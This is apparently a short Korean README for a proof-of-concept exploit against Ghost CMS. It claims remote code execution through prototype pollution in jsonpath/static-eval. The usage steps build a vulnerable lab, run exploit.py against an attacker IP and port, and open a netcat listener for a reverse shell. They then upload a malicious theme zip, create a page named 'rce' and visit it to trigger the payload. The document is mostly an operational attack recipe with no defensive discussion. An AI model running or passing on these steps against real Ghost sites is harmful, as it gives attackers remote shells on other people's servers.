
# Ghost CMS 원격 코드 실행 PoC 익스플로잇 jsonpath와 static-eval의 프로토타입 오염(prototype pollution)을 통한 Ghost CMS 원격 코드 실행(RCE) 개념 증명(PoC) 익스플로잇으로, 취약한 환경 구성 및 사용 방법을 포함합니다.
Ghost CMS에서 jsonpath/static-eval 프로토타입 체인을 통한 RCE.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip 업로드rce인 페이지 생성/rce/ 방문